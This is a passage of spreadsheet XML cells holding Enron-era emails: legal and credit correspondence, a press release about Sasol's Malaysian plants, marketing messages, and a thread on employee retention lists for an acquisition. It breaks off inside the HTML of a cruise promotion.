    <t>Tue, 8 May 2001 13:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jr.@enron.com', 'errol.mclaughlin@enron.com'})</t>
  </si>
  <si>
    <t>MCLAUGHLIN, JR., ERROL L,_x000D_
?_x000D_
You have been selected to participate in the Mid Year 2001 Performance _x000D_
Management process.  Your feedback plays an important role in the process, _x000D_
and your participation is critical to the success of Enron's Performance _x000D_
Management goals._x000D_
?_x000D_
To complete a request for feedback, access PEP at http://pep.enron.com and _x000D_
select Complete Feedback from the Main Menu.  You may begin providing _x000D_
feedback immediately and are requested to have all feedback forms completed _x000D_
by Friday, May 25, 2001. _x000D_
?_x000D_
If you have any questions regarding PEP or your responsibility in the _x000D_
process, please contact the PEP Help Desk at:_x000D_
Houston:  1.713.853.4777, Option 4 or email: perfmgmt@enron.com_x000D_
London:  44.207.783.4040, Option 4 or email: pep.enquiries@enron.com _x000D_
?_x000D_
Thank you for your participation in this important process. _x000D_
?_x000D_
The following is a CUMULATIVE list of employee feedback requests with a _x000D_
status of "OPEN."  Once you have submitted or declined an employee's request _x000D_
for feedback, their name will no longer appear on this list.  NOTE: YOU WILL _x000D_
RECEIVE THIS MESSAGE EACH TIME YOU ARE SELECTED AS A REVIEWER. _x000D_
?_x000D_
Employee Name:_x000D_
HOGAN, IRENA</t>
  </si>
  <si>
    <t>Wed, 2 Feb 2000 08:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Puget Sound Energy, Inc.</t>
  </si>
  <si>
    <t>Tracy Ngo will be preparing credit for an ISDA.  The draft should be sent to _x000D_
(Steve) Morus at the CP (check the green file because we've done an _x000D_
omnibus).  You can insert NY law but no other omnibus changes need to be _x000D_
made.  Thanks.  Sara</t>
  </si>
  <si>
    <t>Tue, 19 Oct 1999 07:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'markehaedicke@aol.com'})</t>
  </si>
  <si>
    <t>Is your new address working?</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 02:07:50 -0800 (PST)</t>
  </si>
  <si>
    <t>Sasol Launches Olefin Crackers In Malaysia For Asian Markets, in an_x000D_
 Advisory by Industrialinfo.com</t>
  </si>
  <si>
    <t>Welcome to eMail News Delivery, a service from Business Wire._x000D_
Here is your Industrial Information Resources Inc. news release._x000D_
If you have received this in error please send a message to:_x000D_
eMailDelivery@businesswire.com_x000D_
with the following command in the body of the message:_x000D_
 unsubscribe TX-INDUSTRIAL-INFO-RES_x000D_
If you have questions about this service, please contact your_x000D_
Business Wire Account Executive or service@businesswire.com_x000D_
_x000D_
_x000D_
BW2008  JAN 10,2002       2:06 PACIFIC      05:06 EASTERN_x000D_
_x000D_
_x000D_
( BW)(TX-INDUSTRIAL-INFO-RES) Sasol Launches Olefin Crackers In_x000D_
Malaysia For Asian Markets, in an Advisory by Industrialinfo.com_x000D_
_x000D_
    Business Editors_x000D_
_x000D_
	   HOUSTON--(BUSINESS WIRE)--Jan. 10, 2002--The following is an_x000D_
advisory by Industrialinfo.com (Industrial Information Resources_x000D_
Incorporated, Houston). Two petrohemical projects worth $100 million_x000D_
are now being launched in Malaysia by Sasol, the South African_x000D_
petrochemicals and synfuels company. The first plant going on stream_x000D_
at Kernith is a cracker for the production of ethylene and propylene_x000D_
from natural gas. It will produce 600,000 tons of ethylene and 85,000_x000D_
tons of propylene per annum. Sasol has a 12% interest in this plant,_x000D_
with Malaysia's Petronas taking 64% and the U.S. company Dow 24%._x000D_
	   The adjacent plant at Petilin will produce 255,000 tons of_x000D_
low-density polyethylene a year and will service markets in China,_x000D_
Taiwan, other Asian countries and Africa. Sasol has a 40% share in_x000D_
this plant with Petronas 40% and DSM from Holland 20%._x000D_
	   The two plants will increase Sasol's production of polyethylene by_x000D_
50%. Sasol will use its 10% interest in Wesco, a distributor of_x000D_
polymer products in China and Taiwan, to access Asian markets for its_x000D_
Malaysian output._x000D_
	   Industrialinfo.com provides daily news related to the industrial_x000D_
market place including industry alerts and databases for the energy_x000D_
and industrial markets. For more information on trends and upcoming_x000D_
construction activities for the petrochemical chemical markets as well_x000D_
as other industrial sectors send inquiries to_x000D_
chemicalgroup@industrialinfo.com or visit us at_x000D_
www.industrialinfo.com._x000D_
_x000D_
    --30--AA/ho*_x000D_
_x000D_
    CONTACT: Industrialinfo.com, Houston_x000D_
             Trey Hamblet, 713/783-5147_x000D_
_x000D_
    KEYWORD: TEXAS MALAYSIA CHINA TAIWAN INTERNATIONAL ASIA PACIFIC_x000D_
EUROPE AFRICA/MIDDLE EAST_x000D_
    INDUSTRY KEYWORD: CHEMICALS/PLASTICS ENERGY_x000D_
    SOURCE: Industrialinfo.com_x000D_
_x000D_
For the best viewing of the news releases please_x000D_
 use the following email settings:  Courier 10 point._x000D_
 -Notice of Copyright and General Disclaimer-_x000D_
 (c) 2000 Business Wire. All of the releases provided by Business Wire_x000D_
 are protected by copyright and other applicable laws, treaties and_x000D_
 conventions. Information contained in the releases is furnished by_x000D_
 Business Wire`s members who are solely responsible for their content,_x000D_
 accuracy and originality. All reproduction, other than for an_x000D_
 individual user`s reference, is prohibited without prior written_x000D_
 permission._x000D_
_x000D_
- Notice of Copyright and General Disclaimer --_x000D_
(c) 1999 Business Wire. All of the releases provided by Business Wire_x000D_
are protected by copyright and other applicable laws, treaties and_x000D_
conventions. Information contained in the releases is furnished by_x000D_
Business Wire`s members who are solely responsible for their content,_x000D_
accuracy and originality. All reproduction, other than for an_x000D_
individual user`s reference, is prohibited without prior written_x000D_
permission._x000D_
- Notice of Copyright and General Disclaimer --_x000D_
(c) 1999 Business Wire. All of the releases provided by Business Wire_x000D_
are protected by copyright and other applicable laws, treaties and_x000D_
conventions. Information contained in the releases is furnished by_x000D_
Business Wire`s members who are solely responsible for their content,_x000D_
accuracy and originality. All reproduction, other than for an_x000D_
individual user`s reference, is prohibited without prior written_x000D_
permission.</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 07:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting with Rod Nelson</t>
  </si>
  <si>
    <t>Suzanne:_x000D_
Please set up a meeting next week with Rod Nelson to talk about issues _x000D_
relating to the Reliant Energy Services draft ISDA and CSA Schedules.  We _x000D_
probably need about 1 hour.  Thanks._x000D_
Carol</t>
  </si>
  <si>
    <t>Mon, 24 Dec 2001 13:42:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ussearch.203339.1512.0@reply.ussearch.com'})</t>
  </si>
  <si>
    <t>Doris Receives a Financial Shock</t>
  </si>
  <si>
    <t>_x000D_
Exhaustive Background Search - Save $15!_x000D_
Seasons Greetings GERALD NEMEC, _x000D_
Discover the things in their past that may affect your future! Don't let your_x000D_
emotions cloud your judgment. Take action and dispel your fears, and make_x000D_
this holiday season a happy one._x000D_
                  _x000D_
To take advantage of this promotion before the 31st of December when this offer_x000D_
expires, please visit: http://click.ussearch.com/kc123203339.1512.0.862 $15 off Our Exhaustive Background Search! _x000D_
Check out what you can get for $44.95:_x000D_
- Current and previous addresses going back 10 years_x000D_
- Phone numbers (listed)_x000D_
- Possible aliases_x000D_
- Relatives, roommates, family members, spouses or friends who may have _x000D_
   shared an address and possible neighbors_x000D_
- Deceased search (name, date of birth, date deceased)_x000D_
- Bankruptcies, civil judgments (lawsuits) and tax liens_x000D_
- Real property value_x000D_
- Expert specialists analyze and run your search to get you the best possible results_x000D_
- Easy to read e-mail report within 24 hours_x000D_
- 1 hour rush service available._x000D_
          _x000D_
                        _x000D_
___________________________________________________________________x000D_
You are receiving this email because you opted to receive special offers from _x000D_
US SEARCH.com. Do not reply to this email. To Unsubscribe Please visit: http://click.ussearch.com/kc123203339.1512.0.646  _x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Wed, 8 Sep 1999 00:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Wollschlager - Mediation -Reply</t>
  </si>
  <si>
    <t>Are we running into a problem with the Nov. 3 trial setting?</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 07:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Robertson Stephans</t>
  </si>
  <si>
    <t xml:space="preserve">Of course not!  Therefore, rank it LOW._x000D_
_x000D_
_x000D_
_x000D_
	"Peters, Jason" &lt;jasonpeters@akllp.com&gt;_x000D_
	11/29/2000 03:51 PM_x000D_
		 _x000D_
		 To: &lt;Sara.Shackleton@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: Robertson Stephans_x000D_
_x000D_
_x000D_
I have not reviewed it yet.  Do we know where it ranks on the priority_x000D_
scale?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Wednesday, November 29, 2000 3:33 PM_x000D_
To: Peters, Jason_x000D_
Subject: Robertson Stephans_x000D_
_x000D_
_x000D_
Jason:  I believe you have this agreement as well.  Can you bring me up_x000D_
to_x000D_
date?  Thanks.  sara_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 04:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>More Alliance Pipeline Delivery Points To Be Added</t>
  </si>
  <si>
    <t xml:space="preserve">Melba_x000D_
_x000D_
Please set up the following new delivery points:_x000D_
_x000D_
1) The interconnection between Alliance Pipeline Company and Midwestern Gas _x000D_
Transmission Company located in Will County, Illinois_x000D_
_x000D_
2) The interconnection between Alliance Pipeline Company and Natural Gas _x000D_
Pipeline Company of America located in Grundy County, Illinois_x000D_
_x000D_
3) The interconnection between Alliance Pipeline Company and Nicor Gas _x000D_
Company located in Grundy County, Illinois_x000D_
_x000D_
4) The interconnection between Alliance Pipeline Company and Peoples Gas _x000D_
Light and Coke Company located in Will County, Illinois_x000D_
_x000D_
5) The interconnection between Alliance Pipeline Company and Vector Pipeline _x000D_
Company located in Will County, Illinois_x000D_
_x000D_
I'd like to have these the Natural Gas Pipeline point set up yet today, as I _x000D_
think we will probably start to trade this point tomorrow._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 08:25:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'y..resendez@enron.com', 'judy.townsend@enron.com', 'souad.mahmassani@enron.com', 'l..dinari@enron.com', 'genia.fitzgerald@enron.com', 'r..conner@enron.com', 'jay.reitmeyer@enron.com', 'brad.coleman@enron.com', 'loftus.fitzwater@enron.com', 'dutch.quigley@enron.com', 'sean.riordan@enron.com', 'judy.thorne@enron.com', 'richard.deming@enron.com', 'k..allen@enron.com', 'dan.mccairns@enron.com', 'steven.curlee@enron.com', 'steve.van@enron.com', 'j..ewing@enron.com', 'joanne.harris@enron.com', 'a..price@enron.com', 'shonnie.daniel@enron.com', 'tom.moran@enron.com', 'bryce.baxter@enron.com', 'angelo.miroballi@enron.com', 'lee.jackson@enron.com', 'jay.knoblauh@enron.com', 'rebecca.phillips@enron.com', 'greg.brazaitis@enron.com', 'denver.plachy@enron.com', 'gerald.nemec@enron.com', 'joe.hunter@enron.com', 'ina.rangel@enron.com', 'sara.shackleton@enron.com', 'vladi.pimenov@enron.com', 'j..farmer@enron.com', 'christina.bangle@enron.com', 'j..sturm@enron.com', 'a.hernandez@enron.com', 'matthew.lenhart@enron.com', 'jabari.martin@enron.com', 'a..shankman@enron.com', 'kelli.little@enron.com', 'kevin.ruscitti@enron.com', "monique'.'sanchez@enron.com", 'k..ratnala@enron.com', 't..lucci@enron.com', 'mary.ogden@enron.com', 'david.draper@enron.com', 'm..tholt@enron.com', 'f..brawner@enron.com', 'lester.rawson@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'tiffany.smith@enron.com', 'lucy.ortiz@enron.com', 'ellen.wallumrod@enron.com', 'kathryn.bussell@enron.com', 'w..pereira@enron.com', 'm..singer@enron.com', 'nelson.ferries@enron.com', 'geoff.storey@enron.com', 'ann.murphy@enron.com', 'tanya.rohauer@enron.com', 'p..south@enron.com', 'teresa.seibel@enron.com', 'russell.diamond@enron.com', 'scott.goodell@enron.com', 'yuan.tian@enron.com', 'michael.etringer@enron.com', 's..theriot@enron.com', 'jennifer.jennings@enron.com', 'andrea.ring@enron.com', 'h..lewis@enron.com', 'b..fleming@enron.com', 'john.griffith@enron.com', 'eric.boyt@enron.com', 'craig.breslau@enron.com', 'lisa.valderrama@enron.com', 'mike.grigsby@enron.com', 'gregory.schockling@enron.com', 's..pollan@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'f..keavey@enron.com', 'r..brackett@enron.com', 'jeff.stephens@enron.com', 'clinton.anderson@enron.com', 'william.stuart@enron.com', 's..bradford@enron.com', 'david.parquet@enron.com', 'j..miller@enron.com', 'stephanie.stehling@enron.com', 'jennifer.fraser@enron.com', 'derek.bailey@enron.com', 'lisa.gillette@enron.com', 'raiford.smith@enron.com', 'eric.bass@enron.com', 'john.arnold@enron.com', 'jake.thomas@enron.com', 'patrick.hanse@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'a..allen@enron.com', 'h..otto@enron.com', 'santiago.garcia@enron.com', 'randy.otto@enron.com', 'keith.holst@enron.com', 'paul.tate@enron.com', 'bernard.dahanayake@enron.com', 'daniel.quezada@enron.com', 'bryan.hull@enron.com', 'george.huan@enron.com', 'steve.neal@enron.com', 'eric.moon@enron.com', 'beth.perlman@enron.com', 'c..aucoin@enron.com', 'kevin.bosse@enron.com', 'd..sorenson@enron.com', 'janelle.scheuer@enron.com', 'b..boxx@enron.com', 'alex.hernandez@enron.com', 'r..lilly@enron.com', 'maria.garza@enron.com', 'joni.fisher@enron.com', 'a..martin@enron.com', 'sherry.pendegraft@enron.com', 's..shively@enron.com', 'sheetal.patel@enron.com', 'l..mims@enron.com', 'd..baughman@enron.com', 'diane.anderson@enron.com', 'r..barker@enron.com', 'nathan.hlavaty@enron.com', 'mark.breese@enron.com', 'chris.lambie@enron.com', 'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'ed.mcmichael@enron.com', 'tracy.ngo@enron.com', 'shauywn.smith@enron.com', 'tay.canacoo@enron.com', 'daniel.reck@enron.com', 'n..gilbert@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'mike.maggi@enron.com', 'vladimir.gorny@enron.com', 'jonathan.horne@enron.com', 'gregg.penman@enron.com', 'sheila.glover@enron.com', 't..hodge@enron.com', 'lisa.lees@enron.com', 's..bryan@enron.com', 's..olinger@enron.com', 'stephanie.sever@enron.com', 'm.hall@enron.com', 'darren.espey@enron.com', 'dennis.benevides@enron.com', 'w..eubanks@enron.com', 'fred.lagrasta@enron.com', 'l..kelly@enron.com', 'craig.taylor@enron.com', 'larry.may@enron.com', 'john.grass@enron.com', 'n..gray@enron.com', 'louis.dicarlo@enron.com', 'tom.donohoe@enron.com', 'jungsuk.suh@enron.com', 'carol.st.@enron.com', 'l..gay@enron.com', 'thomas.mcfatridge@enron.com', 'jason.panos@enron.com', 't..muzzy@enron.com', 'cyndie.balfour-flanagan@enron.com', 'chris.germany@enron.com', 'cynthia.franklin@enron.com', 'ragan.bond@enron.com', 'tana.jones@enron.com', 'jim.willis@enron.com', 'john.lavorato@enron.com', 'stacey.richardson@enron.com', 'j..hanson@enron.com', 'dayem.khandker@enron.com', 'maureen.smith@enron.com', 'trading &lt;.williams@enron.com&gt;', 'leslie.reeves@enron.com', 'jennifer.blay@enron.com', 'audrey.cook@enron.com', 'bob.bowen@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--Week of 11/19/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised Credit Watch listing for the week of 11/19/01.   The Yuma Companies (Inc.) has been added to this week's "Call Credit" column._x000D_
If there are any personnel in your group that were not included in this distribution, please insure that they receive a copy of this report._x000D_
To add additional people to this distribution, or if this report has been sent to you in error, please contact Veronica Espinoza at x6-6002._x000D_
_x000D_
For other questions, please contact Jason R. Williams at x5-3923,  Veronica Espinoza at x6-6002 or Darren Vanek at x3-1436._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 07:57:49 -0800 (PST)</t>
  </si>
  <si>
    <t>you tell me, my schedule is pretty open_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 9:57 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ok when?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 9:54 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
cant we just go for one day_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 9:51 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
they are lighting the tree on wednesday in ny!  we are going to miss it.</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 02:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ozzie.pagan@enron.com', 'heather.kroll@enron.com', 'reagan.rorschach@enron.com', 'tom.chapman@enron.com', 'jeffrey.keenan@enron.com'})</t>
  </si>
  <si>
    <t>RE: CPCN proceeding - AG intervention</t>
  </si>
  <si>
    <t xml:space="preserve">Please note._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 09/12/2000 09:53 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Duncan, Allyson" &lt;aduncan@kilstock.com&gt; on 09/12/2000 09:41:54 AM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: CPCN proceeding - AG intervention_x000D_
_x000D_
I thought you might ask me that!  NCNG could make the request, but we would_x000D_
have a good argument that it doesnt have the same need to know as the Public_x000D_
Staff and Attorney General (which both represent "the Public") and that the_x000D_
potential for misuse of proprietary information is much greater and harder_x000D_
to circumscribe.  I tend to think NCNG would not ask.  Based on the limited_x000D_
statement of interest in their petition to intervene, it's hard for me to_x000D_
see what they could justify asking for.  Also, they always have to be_x000D_
careful, because more often than not, they are going to be on the receiving_x000D_
end of data requests.  They can't argue that they're entitled to obtain_x000D_
certain information if they ever want to argue that they don't have to_x000D_
disclose the same thing._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, September 12, 2000 10:14 AM_x000D_
To: Duncan, Allyson_x000D_
Subject: RE: CPCN proceeding - AG intervention_x000D_
_x000D_
_x000D_
_x000D_
Can the gas company also make the same requests?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Duncan, Allyson" &lt;aduncan@kilstock.com&gt; on 09/12/2000 09:08:11 AM_x000D_
_x000D_
To:   "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;, "Duncan, Allyson"_x000D_
      &lt;aduncan@kilstock.com&gt;_x000D_
cc:   Tom.Chapman@enron.com, Heather.Kroll@enron.com,_x000D_
      Ozzie.Pagan@enron.com, Jeffrey.Keenan@enron.com,_x000D_
      Reagan.Rorschach@enron.com, "Fine, Jonathan" &lt;JFine@kilstock.com&gt;_x000D_
_x000D_
Subject:  RE: CPCN proceeding - AG intervention_x000D_
_x000D_
The NC Attorney General asserts a statutory right to intervene which I_x000D_
think_x000D_
misreads the statute but which the Commission has always allowed.  The AG_x000D_
routinely intervenes.  I suspect that in this case they are interested in_x000D_
the possibility of bypass and the merchant plant issue.  I will call Len_x000D_
Green today to find out.  The AG can make the same discovery requests that_x000D_
the Public Staff makes, subject, as was the case with the Public Staff, to_x000D_
the execution of a confidentiality agreement._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, September 12, 2000 10:00 AM_x000D_
To: aduncan@kilstock.com_x000D_
Cc: Tom.Chapman@enron.com; Heather.Kroll@enron.com;_x000D_
Ozzie.Pagan@enron.com; Jeffrey.Keenan@enron.com;_x000D_
Reagan.Rorschach@enron.com; jfine@kilstock.com_x000D_
Subject: CPCN proceeding - AG intervention_x000D_
_x000D_
_x000D_
Hi Allyson,_x000D_
_x000D_
What is your impression of why the NC attorney general's office has_x000D_
intervened in the CPCN proceeding?  Is this typical?  Does the AG's office_x000D_
(or any other intervenor) have any special rights to discover any of the_x000D_
confidential information we file?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Jan 2002 11:18:59 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Final Documents</t>
  </si>
  <si>
    <t>Not sure what they have against Canada! Anyhow, looks we need to talk to their deal guys._x000D_
_x000D_
-----Original Message-----_x000D_
From: Clark, Eugene [GCO] [mailto:eugene.clark@ssmb.com]_x000D_
Sent: Monday, January 07, 2002 1:05 PM_x000D_
To: Oxley, David; Donnelly, John L [HR]; Arber, Diane Z [HR]_x000D_
Cc: Cash, Michelle; 'lapasini@wlrk.com'_x000D_
Subject: RE: Final Documents_x000D_
_x000D_
_x000D_
David:  I've conferred with J. Donnelly and the business.  We prefer to keep_x000D_
11 of 13; not 14 of 19.  This is how we intend to submit the schedule._x000D_
Regards.  EVC._x000D_
_x000D_
-----Original Message-----_x000D_
From: Oxley, David [mailto:David.Oxley@enron.com]_x000D_
Sent: Monday, January 07, 2002 12:01 PM_x000D_
To: Donnelly, John L [HR]; Arber, Diane Z [HR]_x000D_
Cc: Clark, Eugene [GCO]; Cash, Michelle_x000D_
Subject: RE: Final Documents_x000D_
_x000D_
_x000D_
John/Diane,_x000D_
_x000D_
I just spoke with Lavo. He believes group B should be:_x000D_
_x000D_
Shively_x000D_
Arnold_x000D_
Belden_x000D_
Presto_x000D_
Allen_x000D_
Benson_x000D_
Calger_x000D_
Davis (yes Dana M)_x000D_
Milnthorp_x000D_
Motley_x000D_
Sturm_x000D_
Swerzbin_x000D_
Grigsby_x000D_
Zufferli_x000D_
Martin_x000D_
Neal_x000D_
Herndon_x000D_
Maggi_x000D_
Tycholiz_x000D_
_x000D_
and should be 14 of 19 (ie we could swap out 5)._x000D_
_x000D_
On group c, is this the other 75 or so key commercial and support employees_x000D_
we talked about at the outset?_x000D_
_x000D_
On retention contracts, can you send me example?_x000D_
_x000D_
David_x000D_
_x000D_
-----Original Message-----_x000D_
From: Donnelly, John L [HR] [mailto:john.l.donnelly@ssmb.com]_x000D_
Sent: Monday, January 07, 2002 10:31 AM_x000D_
To: Oxley, David; Arber, Diane Z [HR]_x000D_
Cc: Clark, Eugene [GCO]; Cash, Michelle_x000D_
Subject: RE: Final Documents_x000D_
_x000D_
_x000D_
Please note that we have tightened the non-solicitation language in the_x000D_
retention agreements for for the Group A &amp; B employees. _x000D_
_x000D_
-----Original Message-----_x000D_
From: Oxley, David [mailto:David.Oxley@enron.com]_x000D_
Sent: Monday, January 07, 2002 11:23 AM_x000D_
To: Arber, Diane Z [HR]_x000D_
Cc: Donnelly, John L [HR]; Clark, Eugene [GCO]; Cash, Michelle_x000D_
Subject: RE: Final Documents_x000D_
_x000D_
_x000D_
OK. Let me check final list and I'll get it back with you by 1pm your time._x000D_
_x000D_
-----Original Message-----_x000D_
From: Arber, Diane Z [HR] [mailto:diane.z.arber@ssmb.com]_x000D_
Sent: Monday, January 07, 2002 10:02 AM_x000D_
To: Oxley, David_x000D_
Cc: Donnelly, John L [HR]; Clark, Eugene [GCO]; Cash, Michelle_x000D_
Subject: Final Documents_x000D_
_x000D_
_x000D_
David,_x000D_
The required document which will filed by 4:00 PM today identify the actual_x000D_
employee names who will be part of the new entity. Please confirm the names_x000D_
in  Group A &amp; B and forward the names for group C._x000D_
_x000D_
Section 8.5  Employees.  Prior to Closing, Buyer or its Affiliate shall have_x000D_
entered into retention agreements with (a) each of the three individuals_x000D_
listed on Schedule A, (b) each of the 13 individuals listed on Schedule B,_x000D_
provided the Buyer shall provide substitute different individuals,_x000D_
reasonably acceptable to Buyer, for no more than two individuals on Schedule_x000D_
B, and (c) 80% of the individuals on Schedule C....._x000D_
_x000D_
Group A: Top 3  (3 out of  3 Join)_x000D_
Greg Whaley_x000D_
John Lavorato_x000D_
Louise Kitchen_x000D_
_x000D_
Group B: 13 (11 out of 13 Join)_x000D_
Hunter Shively		_x000D_
Tim Belden		_x000D_
John Arnold		_x000D_
Mike Swerzbin		_x000D_
Fletch Sturm		_x000D_
Matt Motley		_x000D_
Philip Allen		_x000D_
Chris Calger		_x000D_
Kevin Presto		_x000D_
Dana Davis		**Please confirm that this is Mark D Davis_x000D_
Rob Benson		_x000D_
Mike Grigsby		_x000D_
Mike Maggi		_x000D_
_x000D_
Group C: 80%_x000D_
??_x000D_
_x000D_
Please feel free to contact me with any questions._x000D_
_x000D_
Diane Arber_x000D_
Fixed Income Human Resources_x000D_
Phone: (212) 723-9537_x000D_
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 _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 09:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kent.shoemaker@ae.ge.com', 'michael.barnas@ps.ge.com', 'sheila.tweed@enron.com', 'scott.dieball@enron.com', 'roseann.engeldorf@enron.com', 'martin.penkwitz@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Just a reminder about tomorrow's call.  Enron participants, we will have a _x000D_
conference room on the 38th floor of EB available._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 08/22/2000 04:26 _x000D_
PM ---------------------------_x000D_
From: Suzanne Adams@ECT on 08/08/2000 03:57 PM_x000D_
To: kay.mann@enron.com, Sheila Tweed/HOU/ECT@ECT, Scott _x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Roseann _x000D_
Engeldorf/Corp/Enron@ENRON, Brian D _x000D_
Barto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, michael.barnas@ps.ge.com, _x000D_
kent.shoemaker@ae.ge.com_x000D_
cc:  _x000D_
_x000D_
Subject: Weekly GE Conference Call_x000D_
_x000D_
There will be a weekly GE conference call beginning Wednesday, August 16, _x000D_
2000, at 9:30 a.m. CT.  The dialing instructions are below (this will be for _x000D_
every week):_x000D_
_x000D_
Dial In:  1-888-285-4585_x000D_
_x000D_
Participant Code: 536220 (everyone else)_x000D_
_x000D_
If you have any questions, please contact me at x37340.  Thanks, Suzanne_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 09:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kknox@brunini.com'})</t>
  </si>
  <si>
    <t>Re: Address</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you._x000D_
_x000D_
&gt;&gt;&gt; &lt;Kay.Mann@enron.com&gt; 05/01/01 04:10PM &gt;&gt;&gt;_x000D_
_x000D_
1400 Smith,_x000D_
Room 3882A_x000D_
Houston, Tx  77002_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Kim Knox" &lt;kknox@brunini.com&gt; on 05/01/2001 03:34:47 PM_x000D_
_x000D_
To:   &lt;Kay.Mann@Enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  Address_x000D_
_x000D_
Good afternoon.  I am Wilson Montjoy's secretary.  Could you please send me_x000D_
your mailing address for our files?  Thank you._x000D_
_x000D_
Kim Knox_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 04:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bidding</t>
  </si>
  <si>
    <t>A clarification - you can only bid whole dollars for players, i.e no $1.50 _x000D_
bids - O'neal.</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 05:40:08 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: entering names</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reid, Byron  _x000D_
Sent:	Wednesday, November 21, 2001 12:58 AM_x000D_
To:	PepSupport; Bryant, Mike; Bellard, Dannis; Corman, Shelley_x000D_
Subject:	entering names_x000D_
_x000D_
Upon entering names and ALL the other info we are suppose to enter on submitting names for our evaluations I got a message saying "no records found matching your criteria". I tried a couple of names and got the same msg. Therefore I cannot start this process._x000D_
_x000D_
Byron Reid</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 21:40:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sailmail@cunard.com'})</t>
  </si>
  <si>
    <t>You've got SailMail: Stress free Holiday aboard QE2 - 50% off.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
&lt;! &gt;_x000D_
&lt;! &gt;_x000D_
&lt;! ATTENTION!&gt;_x000D_
&lt;! You are reading this message because your mail reader cannot display this HTML message.&gt;_x000D_
&lt;! To view this special opportunity please,&gt;_x000D_
&lt;! click the link below or copy it into a web browser.&gt;_x000D_
&lt;!_x000D_
http://216.229.129.46:8080/ss?click&amp;cunard&amp;3bcc9d75_x000D_
&gt;_x000D_
&lt;! &gt;_x000D_
&lt;!-- EMAIL PAGE WRAPPER --&gt;_x000D_
&lt;HTML&gt;_x000D_
&lt;HEAD&gt;_x000D_
&lt;TITLE&gt;Don't miss the QE2 Holiday Cruise!&lt;/TITLE&gt;_x000D_
&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;_x000D_
&lt;/HEAD&gt;_x000D_
